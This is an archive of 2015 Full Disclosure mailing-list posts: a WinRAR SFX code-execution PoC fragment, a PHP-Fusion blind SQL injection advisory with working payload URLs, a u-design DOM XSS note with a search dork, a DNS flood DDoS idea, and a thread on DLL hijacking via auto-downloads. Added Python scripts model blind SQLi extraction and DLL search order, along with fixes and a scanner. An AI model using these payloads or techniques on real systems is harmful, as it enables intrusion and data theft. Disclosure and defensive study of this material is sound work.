> > 6.  Copy this perl output (HTML) and paste on "Text to display in SFX
> > window"
> > 7.  Click OK -- OK
> > 8.  Your SFX file Created
> > 9.  Just open sfx file
> > 10. Your Link Download/Execute on your target
> > 11. Successful reproduce of the code execution vulnerability!
> >
> >
> > PoC: Exploit Code
> > #!/usr/bin/perl
> > # Title : WinRaR SFX - Remote Code Execution
> > # Affected Versions: All Versions
> > # Tested on Windows 7 / Server 2008
> > #
> > # Author: Mohammad Reza Espargham
> > # Linkedin: https://ir.linkedin.com/in/rezasp
> > # E-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
> > # Website: www.reza.es
> > # Twitter: https://twitter.com/rezesp
> > # F

[FD] Blind SQL Injection in admin panel PHP-Fusion <= v7.02.07

2015-10-05 Thread Manuel Garcia Cardenas
=
MGC ALERT 2015-002
- Original release date: September 18, 2015
- Last revised:  October 05, 2015
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Blind SQL Injection in admin panel PHP-Fusion <= v7.02.07

II. BACKGROUND
-
PHP-Fusion is a lightweight open source content management system (CMS)
written in PHP.

III. DESCRIPTION
-
This bug was found using the portal while authenticated as administrator.
To exploit the vulnerability it is only necessary to use version 1.0 of the
HTTP protocol to interact with the application. It is possible to inject SQL
code into the variable "status" on the page "members.php".

IV. PROOF OF CONCEPT
-
The following URLs and parameters have been confirmed to suffer from
Blind SQL injection.

/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0

Exploiting with true request (with mysql5):

/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0' AND substr(@@version,1,1)='5

Exploiting with false request:

/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0' AND substr(@@version,1,1)='4

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
PHP-Fusion <= v7.02.07

VII. SOLUTION
-
All data received by the application that can be modified by the user must
be validated before any kind of transaction is made with it.

VIII. REFERENCES
-
https://www.php-fusion.co.uk/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
September 18, 2015 1: Initial release
October 10, 2015 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
September 18, 2015 1: Vulnerability acquired by Manuel Garcia Cardenas
September 18, 2015 2: Send to vendor
September 24, 2015 3: Second mail to the vendor without response
October   10, 2015 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
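The true and false requests in the advisory are the oracle of a boolean-based blind injection: each request asks one yes/no question about a single character of a value, and the answer is whether the member list comes back. The script below is an added example, not PHP-Fusion's code or the advisory's. It rebuilds the bug class against an in-memory SQLite database (the `users` table, the `members_vulnerable()` query that pastes the `status` parameter into the SQL text, and `sqlite_version()` standing in for MySQL's `@@version` are all assumptions made so it runs offline), drives the same `substr(...)='x'` oracle to recover a value character by character, and shows the parameterised query beside it, against which the same payloads recover nothing.

```python
"""Boolean-based blind SQL injection, modelled offline.

Added example (not PHP-Fusion code). Assumptions: the `users` table layout,
the `status` filter in members_vulnerable(), and sqlite_version() standing in
for MySQL's @@version so the script runs without a live target.
"""
import sqlite3
import string


def make_db():
    """Constructed sample data; a real target would be the CMS's user table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, user_name TEXT, user_status INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", 0), (2, "alice", 0), (3, "bob", 1)])
    return db


def members_vulnerable(db, status):
    """The bug class from the advisory: the request parameter is spliced into the
    query text, so a single quote in `status` ends the string literal."""
    sql = "SELECT user_name FROM users WHERE user_status='%s' ORDER BY user_name" % status
    return [row[0] for row in db.execute(sql)]


def members_fixed(db, status):
    """Same query with a bound parameter: the whole payload is compared as one
    status value and matches nothing."""
    sql = "SELECT user_name FROM users WHERE user_status=? ORDER BY user_name"
    return [row[0] for row in db.execute(sql, (status,))]


def oracle(db, members, expr, pos, ch):
    """One blind request in the shape the advisory uses:
        status=0' AND substr(<expr>,<pos>,1)='<ch>
    The original query's own closing quote finishes the literal.
    True iff the member list came back (the 'true request')."""
    payload = "0' AND substr(%s,%d,1)='%s" % (expr, pos, ch)
    return len(members(db, payload)) > 0


def extract(db, members, expr, max_len=32,
            charset=string.digits + string.ascii_letters + "._-"):
    """Recover the value of `expr` one character at a time. A position where no
    character in charset matches is the end of the value."""
    value = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            if oracle(db, members, expr, pos, ch):
                value += ch
                break
        else:
            break
    return value


def db_version(db):
    """Ground truth to compare the blind extraction against."""
    return db.execute("SELECT sqlite_version()").fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print("normal request     :", members_vulnerable(db, "0"))
    print("true request       :", members_vulnerable(db, "0' AND substr(sqlite_version(),1,1)='3"))
    print("false request      :", members_vulnerable(db, "0' AND substr(sqlite_version(),1,1)='4"))
    print("extracted version  :", extract(db, members_vulnerable, "sqlite_version()"), "==", db_version(db))
    print("extracted username :", extract(db, members_vulnerable, "(SELECT user_name FROM users WHERE user_id=1)"))
    print("against fixed query:", repr(extract(db, members_fixed, "sqlite_version()")))
```

The character-by-character loop is the slow, readable form of the technique; a real tool narrows each position by binary search on the character code instead of walking a charset, but the oracle it depends on is exactly the one the advisory's two requests expose.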

Re: [FD] Watch your Downloads: the risk of the "auto-download" feature on Microsoft Edge and Google Chrome

2015-10-05 Thread Lee
Haifei Li, changing the default behavior to open a window asking the
user where to save the file would change nothing.  A "normal user"
would just click the "save" button to save the file in the default
folder.  I also don't think it should be the browser's responsibility
to look for potential malicious DLLs in that directory.  This "normal
user" may not even use the browser to execute this executable file so
they never even see this warning.

If you really want to pursue this problem, I think the OS (MS Windows)
is where you should be looking for a solution.

MS Windows has an "Open File - Security Warning" window before
executing untrusted files.  Again, a "normal user" just clicks "Run"
on that window without reading the warning, but this could be expanded
to also warn about potential malicious DLLs.  Example Image:
http://i.imgur.com/3dxQJCB.png

As long as a "normal user" is given enough privileges to
destroy/infect/... their OS, they will continue to be careless.  You
will never be able to protect these people from themselves.

-Lee


On Fri, Oct 2, 2015 at 6:43 PM, Haifei Li  wrote:
>
> This is a copied version of my blog post, original version 
> http://justhaifei1.blogspot.com/2015/10/watch-your-downloads-risk-of-auto.html.
> Probably it's commonly known that when you try to download something on your modern 
> browser e.g. Google Chrome or Microsoft Edge, the file will be downloaded 
> automatically to your local system with just a simple click - no need for 
> additional confirmations. With default settings, the file will be downloaded 
> to your "Downloads" folder ("C:\Users\\Downloads").
> Personally, I have worried about this feature quite a few times; now I finally 
> got some time to highlight this. (Please tell me if someone has 
> already talked about this; I quickly googled around and wasn't able to find 
> an appropriate one, I think it should be known by many people).
>
> The "auto-download" feature is good from “user experience” perspective, but 
> obviously it's not good for security, as the downloading could also be 
> started by Javascript (). The attacker may just place a 
> malicious DLL with a specific name into the "Downloads" folder when the 
> victim visits a webpage he/she controls. In future, when the victim tries to 
> download/install good programs (executables) from legitimate websites - of 
> course, the good executable will be downloaded, and will be launched from the 
> "Downloads" folder as well - then the installation/execution progress could 
> be hijacked.
>
> This is because, in the real world, most executables rely on DLLs. 
> Anyway, the "application directory" is the very first place in the search 
> order when searching for/loading a DLL (you may want to check the paper I 
> released years ago). So, probably, most DLLs, even the system DLLs, could be 
> hijacked when you place a same-named DLL in the executable's directory, and 
> that's not only for the situation where the DLL being searched for is not 
> anywhere on your system.
>
> Usually, the "Downloads" folder is a place with a massive number of downloaded files, so 
> the victim probably never gets a chance to realize there is a malicious DLL 
> sitting in his/her "Downloads" folder. I'd also doubt that, even if a normal user 
> notices a strange DLL in his/her "Downloads" folder, he/she will really 
> delete it immediately. DLLs won't be executed by themselves anyway, right?
>
> Anyway, in the real world, for most people, who really checks their 
> "Downloads" folder every time they try to install something from the 
> internet? Instead, most people just click the "Run" button directly when 
> installing something (see the following figure).
>
> I have quickly made a video showing this risk. The test environment is 
> Windows 10 Pro, with Microsoft Edge and Google Chrome, fully updated as of 
> Oct 2nd, 2015, all with default settings. Check it out here.
>
>
> As you may have noted, a modified “VERSION.DLL” will be dropped into the 
> “Downloads” folder when visiting the webpage 
> https://dl.dropboxusercontent.com/u/14747595/auto_download_test/test.html. 
> Then, when the user tries to install Adobe Reader from the official adobe.com 
> website, the installation process of Adobe Reader will be hijacked - the 
> modified “VERSION.DLL” will be loaded and my shellcode will be executed.
>
> There's one small thing: the code execution should run outside the browser 
> sandbox, but unluckily the tested shellcode I copied from the internet runs 
> calc.exe, and because there's no calc.exe anymore on Windows 10, what you've 
> seen is just a Calculator App which runs within the App Container sandbox. 
> Other shellcode, for example running notepad.exe, will run outside the App 
> Container sandbox and give the attacker control of your system. 
> #BringTheLovelyCalcBackMicrosoft!
>
> Also note that with default setting, the Microsoft Edge will promote a 
> warning dialog saying the DLL is dangerous, offer

[FD] u-design wordpress theme DOM XSS

2015-10-05 Thread Kenan Gms
u-design is a WordPress theme prone to a DOM XSS vulnerability.

Vendor url:
http://themeforest.net/item/udesign-responsive-wordpress-theme/253220

versions between 2.7.9 – (Updated: 08.05.2015) and 2.3.0 – (Updated:
04.02.2014 - there are 40 of them) are vulnerable to DOM XSS which can be
exploited by adding # to the end of the url.

The vendor has already patched the vulnerability in higher versions, but a
lot of people/companies are still using vulnerable ones.

Dork: inurl:/wp-theme/u-design/
You can check the version from: /wp-content/themes/u-design/style.css
CVE Reference: CVE-2015-7357
Author: @K3n4nG

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] DDos Attack To Drop The Internet

2015-10-05 Thread Jeffrey Roberts
If you were to have a botnet which were to flood random DNS queries
for domains that did not exist to the list of DNS servers hosted on
http://public-dns.tk/nameservers-all.txt then the root dns servers and
the tld dns servers would be overwhelmed without any way to filter the
packets, if they were to filter the packets of the DNS servers, they
themselves would be turning off DNS, hence they can not do that... If
the botnet only hits the DNS servers on the list a few times,
filtering those packets would be insignificant. This attack should in
essence turn off DNS for the world, hence, turning off the internet as
the public knows it today.

-- 
- Jeff

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


Re: [FD] Watch your Downloads: the risk of the "auto-download" feature on Microsoft Edge and Google Chrome

2015-10-05 Thread Stefan Kanthak
"Haifei Li"  wrote:

> This is a copied version of my blog post, original version
> http://justhaifei1.blogspot.com/2015/10/watch-your-downloads-risk-of-auto.html.
> Probably it's commonly known that when you try to download
> something on your modern browser e.g. Google Chrome or
> Microsoft Edge, the file will be downloaded automatically to
> your local system with just a simple clicking - no need for
> additional confirmations. With default settings, the file
> will be downloaded to your "Downloads" folder
> ("C:\Users\\Downloads").
> Personally, I have worried about this feature quite some times,
> now I finally got some time on highlighting this. (Please tell
> me if there's someone already talked about this,

Of course somebody wrote and talked about this already:


> I quickly googled around and wasn't able to find an appropriate
> one, I think it should be known by many ppl).

You can read a little bit more about this weakness and the resulting
vulnerabilities on 

stay tuned
Stefan

JFTR:  is HTML, not JavaScript.

  JavaScript is also not necessary to redirect to the download
  page of some morons who still expect their unsuspecting users
  to download and RUN an *.EXE to install their soft^Wcrapware:
  1.  exists;
  2. Windows' native package format is *.MSI!

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
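The point both messages in this thread turn on, that a DLL dropped into the folder an installer is launched from is loaded ahead of the copy in System32, can be checked without a Windows box. The script below is an added example, not code from either post. It models the loader's default (SafeDllSearchMode) search order (application directory first, then the system directory, the Windows directory, the current directory and PATH, with KnownDLLs always taken from the system directory), builds a constructed Downloads layout in a temporary directory, and scans such a folder for DLLs that an executable run from it would pick up. The `KNOWN_DLLS` set is an illustrative subset of the registry list, and every file name in `build_layout()` is an assumption made for the demonstration.

```python
"""DLL search-order hijack from the Downloads folder, modelled offline.

Added example, not from the original posts. The order modelled is the default
SafeDllSearchMode order; KNOWN_DLLS is an illustrative subset of the registry
list under HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\KnownDLLs,
and every file name in build_layout() is constructed for the demonstration.
"""
import tempfile
from pathlib import Path

# Modules the loader maps from the system directory regardless of the search
# path, so a same-named file beside the EXE is never used. Illustrative subset;
# VERSION.DLL, the module hijacked in the post, is deliberately not in it.
KNOWN_DLLS = {"ntdll.dll", "kernel32.dll", "user32.dll", "gdi32.dll", "advapi32.dll"}


def resolve_dll(name, app_dir, system_dir, windows_dir, cwd, path_dirs=(),
                known_dlls=KNOWN_DLLS):
    """Return the file the loader would map for `name`, or None if not found.
    The application directory is searched before the system directory."""
    name = name.lower()  # Windows file names are case-insensitive
    if name in known_dlls:
        return Path(system_dir) / name
    for d in (app_dir, system_dir, windows_dir, cwd, *path_dirs):
        candidate = Path(d) / name
        if candidate.is_file():
            return candidate
    return None


def scan_downloads(downloads_dir, known_dlls=KNOWN_DLLS):
    """Flag every DLL in a downloads folder: any EXE launched from here loads it
    in preference to the System32 copy unless the name is a KnownDLL."""
    downloads_dir = Path(downloads_dir)
    exes = sorted(p.name for p in downloads_dir.iterdir() if p.suffix.lower() == ".exe")
    findings = []
    for p in sorted(downloads_dir.iterdir()):
        if p.suffix.lower() != ".dll":
            continue
        if p.name.lower() in known_dlls:
            findings.append((p.name, "KnownDLL: ignored by the loader, still suspicious"))
        else:
            findings.append((p.name, "hijack candidate for: " + (", ".join(exes) or "any EXE run here")))
    return findings


def build_layout(root):
    """Constructed directory tree standing in for a Windows install."""
    root = Path(root)
    dirs = {k: root / k for k in ("downloads", "system32", "windows", "cwd")}
    for d in dirs.values():
        d.mkdir()
    (dirs["system32"] / "version.dll").write_bytes(b"genuine")
    (dirs["system32"] / "kernel32.dll").write_bytes(b"genuine")
    # What the auto-download dropped, and what the user later fetched on purpose.
    (dirs["downloads"] / "version.dll").write_bytes(b"attacker")
    (dirs["downloads"] / "kernel32.dll").write_bytes(b"attacker")
    (dirs["downloads"] / "reader_installer.exe").write_bytes(b"installer")
    return dirs


def demo():
    """Which copy of each DLL an installer run from Downloads would load."""
    with tempfile.TemporaryDirectory() as tmp:
        d = build_layout(tmp)
        # app dir = cwd = Downloads, as when the user runs the installer from there
        args = (d["downloads"], d["system32"], d["windows"], d["downloads"])
        version = resolve_dll("VERSION.DLL", *args).read_bytes()
        kernel32 = resolve_dll("KERNEL32.DLL", *args).read_bytes()
        return version, kernel32, scan_downloads(d["downloads"])


if __name__ == "__main__":
    v, k, findings = demo()
    print("VERSION.DLL  ->", v.decode())
    print("KERNEL32.DLL ->", k.decode())
    for name, why in findings:
        print(name, "-", why)
```

The scan is the part worth keeping: a DLL in a user's Downloads folder has no legitimate reason to be there, and the fact that it is a KnownDLL only means the loader will not use it, not that it is harmless.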


Re: [FD] WinRAR SFX v5.21 - Remote Code Execution Vulnerability

2015-10-05 Thread Stefan Kanthak
"Gynvael Coldwind"  wrote:

> Correct me if I'm wrong, but the vulnerability can be summarized as: if you
> run an untrusted .exe you might execute malicious code?

Amen!

> I hardly see this as giving anything new to the attacker who can just
> create a malicious exe file, set the winrar sfx icon and send it to the
> victim.

That's why giving unsuspecting users *.EXE to install a software package
or to unpack an archive and thus training them to run almost anything
they get their hands on is a BLOODY STUPID idea in the first place.

ALWAYS use the platform's native package or archive formats to distribute
your software or files!

> Keep in mind that not every unexpected behavior or software bug is a
> security vulnerability.
> 
> (and no, potential AV bypass doesn't make it a vulnerability either)

Right again.

stay tuned
Stefan

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/